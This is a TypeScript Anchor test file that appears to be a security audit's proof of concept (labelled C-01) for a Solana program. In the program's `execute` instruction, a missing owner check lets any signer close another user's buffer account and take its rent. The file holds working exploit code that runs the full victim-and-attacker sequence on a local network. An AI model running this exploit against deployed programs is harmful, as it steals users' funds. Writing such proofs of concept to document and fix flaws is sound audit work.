/**
 * PoC for Arbitrary buffer closure & rent theft in `buffer-payload::execute`.
 *
 * Vulnerability summary:
 *   The `execute` instruction's `ExecuteContext` only declares `authority: Signer` and
 *   the system program. The buffer to close is pulled out of `ctx.remaining_accounts.last()`
 *   with no PDA-seed / owner-binding check. The only validation performed
 *   (`deserialize_from_buffer_account`) merely checks the account's *program owner*
 *   equals `buffer_payload::ID`. As a result, any signer can pass any other user's
 *   completed Buffer PDA and have its rent lamports redirected to themselves via
 *   `buffer.close(ctx.accounts.authority.to_account_info())`.
 *
 * What this test demonstrates end-to-end:
 *   1. Victim funds and fills a Buffer PDA at seeds
 *      [EXECUTION_REPORT_BUFFER, buffer_id, victim.pubkey] using
 *      `buffer_execution_report`. Rent is paid by Victim.
 *   2. The attacker reads the (public) `buffer_id` + Victim's pubkey from chain,
 *      derives the Buffer PDA, and calls `execute(report = vec![], fail = false)`
 *      with: `authority = attacker`, and `remaining_accounts = [victimBufferPda]` (writable).
 *   3. The instruction succeeds. The Buffer account is closed: its lamports flow
 *      to the attacker, its data is zeroed.
 *
 * Run from `contracts/`:
 *   anchor test --skip-build  # if programs are already built
 *
 *   To target only this file:
 *   anchor test --skip-build -- --grep "C-01"
 */

import * as anchor from "@coral-xyz/anchor";
import { Program } from "@coral-xyz/anchor";
import {
  Keypair,
  PublicKey,
  SystemProgram,
  LAMPORTS_PER_SOL,
  TransactionInstruction,
  Transaction,
  sendAndConfirmTransaction,
  AccountMeta,
} from "@solana/web3.js";
import { assert } from "chai";
import { randomBytes } from "crypto";
import { newSigner, sendLamports } from "./utils";

// The buffer-payload program is generated by `anchor build`. Anchor emits the
// IDL/types under `target/types/buffer_payload.ts`. We type as `any` to avoid
// hard-coupling this PoC to that generated file (the PoC is a one-shot test).
type BufferPayload = any;

const EXECUTION_REPORT_BUFFER = Buffer.from("execution_report_buffer");
const CONFIG = Buffer.from("config");

const deriveBufferPda = (
  programId: PublicKey,
  bufferId: Buffer,
  authority: PublicKey
): [PublicKey, number] =>
  PublicKey.findProgramAddressSync(
    [EXECUTION_REPORT_BUFFER, bufferId, authority.toBuffer()],
    programId
  );

const deriveConfigPda = (programId: PublicKey): [PublicKey, number] =>
  PublicKey.findProgramAddressSync([CONFIG], programId);

describe("buffer-payload::execute arbitrary buffer closure / rent theft", function () {
  this.timeout(60_000);

  const provider = anchor.AnchorProvider.env();
  anchor.setProvider(provider);

  const program = anchor.workspace.BufferPayload as Program<BufferPayload>;
  const programId = program.programId;

  // The buffer-payload program requires a one-time `initialize` to create the
  // global Config PDA. It's a no-op for the exploit itself; we just need it to
  // exist so that `buffer_execution_report` (which takes Config as a read-only
  // account) succeeds. Any signer can initialize.
  before(async () => {
    const [configPda] = deriveConfigPda(programId);
    const existing = await provider.connection.getAccountInfo(configPda);
    if (existing === null) {
      await program.methods
        .initialize()
        .accounts({
          config: configPda,
          authority: provider.wallet.publicKey,
          systemProgram: SystemProgram.programId,
        })
        .rpc();
    }
  });

  it("attacker closes a completed buffer they do NOT own and drains its rent", async () => {
    // ---------------------------------------------------------------------
    // Setup: independent victim and attacker wallets, each funded.
    // ---------------------------------------------------------------------
    const victim = await newSigner(provider.connection);
    const attacker = await newSigner(provider.connection);

    const victimProgram = new anchor.Program<BufferPayload>(
      program.idl,
      programId,
      victim.provider
    );
    const attackerProgram = new anchor.Program<BufferPayload>(
      program.idl,
      programId,
      attacker.provider
    );

    const [configPda] = deriveConfigPda(programId);

    // ---------------------------------------------------------------------
    // Step 1 — Victim populates a fully-complete Buffer.
    //
    // We use a single-chunk buffer whose decoded `Report` payload is empty
    // (`vec![]`). The instruction handler's `is_complete()` check + the
    // `buffered_bytes == report_length` check both pass for any completed
    // buffer regardless of contents.
    // ---------------------------------------------------------------------
    const bufferId = randomBytes(16); // arbitrary, publicly observable on-chain
    // A Report has shape `{ report: Vec<u8> }`. Borsh-encoded empty Vec<u8> is
    // 4 zero bytes (u32 length = 0). So the smallest possible complete buffer
    // payload is exactly 4 bytes.
    const payload = Buffer.from([0, 0, 0, 0]);

    await victimProgram.methods
      .bufferExecutionReport(
        bufferId,
        payload.length, // report_length
        payload, // chunk
        0, // chunk_index
        1 // num_chunks
      )
      .accounts({
        buffer: deriveBufferPda(programId, bufferId, victim.keypair.publicKey)[0],
        config: configPda,
        authority: victim.keypair.publicKey,
        systemProgram: SystemProgram.programId,
      })
      .signers([victim.keypair])
      .rpc();

    const [victimBufferPda] = deriveBufferPda(
      programId,
      bufferId,
      victim.keypair.publicKey
    );

    const bufferAccountBefore = await provider.connection.getAccountInfo(
      victimBufferPda
    );
    assert.isNotNull(
      bufferAccountBefore,
      "precondition: victim's buffer PDA must exist before the attack"
    );
    const stolenRent = bufferAccountBefore!.lamports;
    assert.isAbove(
      stolenRent,
      0,
      "precondition: victim's buffer PDA must hold rent lamports"
    );

    // ---------------------------------------------------------------------
    // Step 2 — Attacker calls `execute(report = vec![], fail = false)` and
    // passes the VICTIM'S buffer PDA as the last remaining account, writable.
    //
    // The transaction is signed only by the attacker. The victim does not
    // sign anything. The buffer PDA is owned by the buffer-payload program,
    // so simply marking it writable in the tx is sufficient — Anchor's
    // `close()` (called by the program) handles the lamport transfer + data
    // zero-out + system-program reassignment under the program's authority.
    // ---------------------------------------------------------------------
    const attackerBalanceBefore = await provider.connection.getBalance(
      attacker.keypair.publicKey
    );

    await attackerProgram.methods
      .execute(Buffer.from([]), false) // report = empty Vec<u8>, fail = false
      .accounts({
        authority: attacker.keypair.publicKey,
        systemProgram: SystemProgram.programId,
      })
      .remainingAccounts([
        {
          pubkey: victimBufferPda,
          isSigner: false,
          isWritable: true, // <-- attacker-controlled writability; no on-chain check rejects this
        } as AccountMeta,
      ])
      .signers([attacker.keypair])
      .rpc();

    // ---------------------------------------------------------------------
    // Step 3 — Verify the impact.
    //   (a) Victim's buffer PDA is gone (closed: lamports = 0, data zeroed,
    //       owner reassigned to system program — getAccountInfo returns null
    //       once lamports reach 0).
    //   (b) Attacker's SOL balance increased by ~stolenRent (minus the tx fee
    //       the attacker paid).
    // ---------------------------------------------------------------------
    const bufferAccountAfter = await provider.connection.getAccountInfo(
      victimBufferPda
    );
    assert.isNull(
      bufferAccountAfter,
      "victim's buffer PDA should be closed by the attacker's execute() call"
    );

    const attackerBalanceAfter = await provider.connection.getBalance(
      attacker.keypair.publicKey
    );

    // Account for the transaction fee the attacker paid (5000 lamports per
    // signature on localnet; allow generous slack for compute fees).
    const FEE_SLACK = 50_000;
    const delta = attackerBalanceAfter - attackerBalanceBefore;
    assert.isAtLeast(
      delta,
      stolenRent - FEE_SLACK,
      `attacker should have received the buffer's rent (~${stolenRent} lamports). actual delta=${delta}`
    );

    console.log(
      `[C-01 PoC] stolen rent: ${stolenRent} lamports (${
        stolenRent / LAMPORTS_PER_SOL
      } SOL); attacker net delta: ${delta} lamports`
    );
  });
});
